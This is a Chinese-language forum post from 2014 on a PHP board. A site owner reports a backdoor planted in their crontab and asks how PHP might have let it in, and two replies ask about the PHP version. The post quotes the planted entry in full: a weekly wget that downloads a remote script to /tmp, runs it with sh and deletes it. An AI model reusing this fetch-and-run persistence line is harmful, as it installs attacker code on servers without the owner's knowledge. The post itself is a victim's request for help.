作者averywu (看文不要只會用橫的看)
看板PHP
標題Fw: [問題] 被植入後門
時間Wed Oct 1 11:19:10 2014
我的站台的crontab 被寫入
@weekly wget
http://x/bots/regulat.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh > /dev/null 2&1
目前已知不影響主機,因為URL已經失效了。
PS.貼出來的URL已經處理過了,domain我改成x,以防被誤點。
但實在找不出他植入的方法,有人知道嗎?
PHP是否有什麼漏洞能讓入侵者植入這個script嗎?
--
小惡魔的家
http://blog.pixnet.net/shiuju/
--
※ 編輯: averywu (60.251.237.155), 10/01/2014 11:20:00
1F:→ mmis1000: 版本?記得舊版之前有爆出大洞? 10/01 12:35
2F:→ averywu: PHP版本是5.3 10/02 10:27